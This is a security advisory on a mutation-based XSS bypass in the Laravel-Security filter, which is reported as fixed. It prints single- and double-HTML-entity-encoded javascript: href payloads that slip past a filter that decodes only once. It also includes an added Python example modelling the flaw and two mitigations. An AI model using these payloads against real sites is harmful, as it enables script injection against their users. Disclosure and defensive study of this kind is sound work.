Mayk0

#; Lavarel-Security XSS Filter Bypass Vulnerability

May 1st, 2014
Full title: Laravel-Security XSS Filter Bypass Vulnerability
Date added: 2014-05-01
Category: web applications
Platform: php
Risk: Security Risk Low
===================================

*#Product: Laravel-Security XSS Filter Bypass*
*#Vulnerability: Mutation Based XSS Bypass*
*#Impact: Medium/High*
*#Authors: Rafay Baloch*
*#Company: RHAinfoSEC*
*#Website: http://rhainfosec.com*
*#Status: Fixed*

*=========*
*Description*
*=========*

Laravel Security is a port of the security class from CodeIgniter 2.1 to
Laravel 4.1. It relies on a blacklist approach to filter out common
malicious inputs.

*=========*
*Vulnerability*
*==========*

The vulnerability lies in the fact that the XSS filter decoded HTML
entities before applying its checks. Because of this, it was possible to
construct a payload that passed the filtering mechanism and would still
execute JavaScript.

*=============*
*Proof of concept*
*=============*

During initial testing the following input was provided:

<a
href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>

The filter decoded the HTML entities, and hence the attack was blocked.

After decoding:

<a href="javascript:alert(1)">Clickhere</a>

Next, we double-encoded the entities:

<a
href="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49">Clickhere</a>

Since the filter decodes the entities only once, we are left with the
following:

<a
href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>

This is valid syntax inside an href attribute and would execute
JavaScript.

*===*
*Fix*
*===*

The vulnerability has been fixed: the latest version no longer decodes HTML
entities, and hence the attack is mitigated.


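The decode-once mismatch described in the proof of concept, and the fix, as an added Python example; it is not part of this advisory or of the Laravel-Security project. It models the vulnerable filter as a single entity decode followed by a blacklist check, builds the single- and double-encoded hrefs with the same decimal-entity construction the advisory uses, and then shows two defensive alternatives: canonicalizing to a fixed point before an allowlist check on the URL scheme, and the approach the fix took, which is to never decode inside the filter and to escape the raw value on output. The helper names, the blacklist pattern and the scheme allowlist are assumptions made for this example.

```python
import html
import re
from urllib.parse import urlsplit


def entity_encode(text: str) -> str:
    """Assumed helper: write every character as a decimal numeric character
    reference without the trailing semicolon, as in the advisory's payloads."""
    return "".join(f"&#{ord(c)}" for c in text)


# Constructed inputs, built the same way as the proof-of-concept hrefs.
SINGLE_ENCODED = entity_encode("javascript:confirm(1)")   # one entity layer
DOUBLE_ENCODED = entity_encode(SINGLE_ENCODED)             # two entity layers

# Assumed blacklist rule standing in for the filter's own patterns.
BLACKLIST = re.compile(r"javascript\s*:", re.IGNORECASE)


def vulnerable_filter_blocks(value: str) -> bool:
    """Model of the vulnerable behaviour: decode entities exactly once, then
    run the blacklist over the result. Returns True when the value is rejected.
    A doubly encoded value is still entity text after one decode, so the
    blacklist never sees the dangerous token."""
    return BLACKLIST.search(html.unescape(value)) is not None


def canonicalize(value: str, max_rounds: int = 8) -> str:
    """Mitigation 1: decode until the string stops changing (a fixed point),
    so nested encodings cannot hide a token from a later check. Inputs that
    need more rounds than expected are treated as hostile and rejected."""
    for _ in range(max_rounds):
        decoded = html.unescape(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("entity nesting deeper than expected; reject input")


# Assumed allowlist; the empty scheme admits relative links.
ALLOWED_SCHEMES = frozenset({"http", "https", "mailto", ""})


def href_is_allowed(value: str) -> bool:
    """Allowlist check on the scheme of the fully canonicalized URL, which is
    the form the browser will actually act on."""
    scheme = urlsplit(canonicalize(value).strip()).scheme.lower()
    return scheme in ALLOWED_SCHEMES


def render_href_without_decoding(raw: str) -> str:
    """Mitigation 2, the approach the fix took: do not decode in the filter at
    all, and escape the raw value when writing it into the attribute. Any
    entities the input carried then remain inert text after the browser's
    single decode."""
    return f'<a href="{html.escape(raw, quote=True)}">Clickhere</a>'


def attribute_value_seen_by_browser(markup: str) -> str:
    """Approximation of the browser's behaviour: markup is decoded exactly
    once when the attribute value is parsed, never a second time."""
    return html.unescape(markup)


if __name__ == "__main__":
    print("single-encoded blocked by vulnerable filter:",
          vulnerable_filter_blocks(SINGLE_ENCODED))
    print("double-encoded blocked by vulnerable filter:",
          vulnerable_filter_blocks(DOUBLE_ENCODED))
    print("canonical form of the double-encoded href:",
          canonicalize(DOUBLE_ENCODED))
    print("double-encoded href passes allowlist:",
          href_is_allowed(DOUBLE_ENCODED))
    print("escaped on output:",
          render_href_without_decoding(DOUBLE_ENCODED)[:60], "...")
```

The two mitigations address the same root cause from opposite sides: either the filter canonicalizes at least as far as the browser will (fixed-point decoding plus a scheme allowlist), or it stops canonicalizing altogether and relies on output encoding, which is what the fixed version does. Mixing the two, decoding once and then trusting a blacklist, is exactly the gap the advisory describes.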
*==========*
*References*
*==========*

https://github.com/GrahamCampbell/Laravel-Security/issues/10#issuecomment-37816413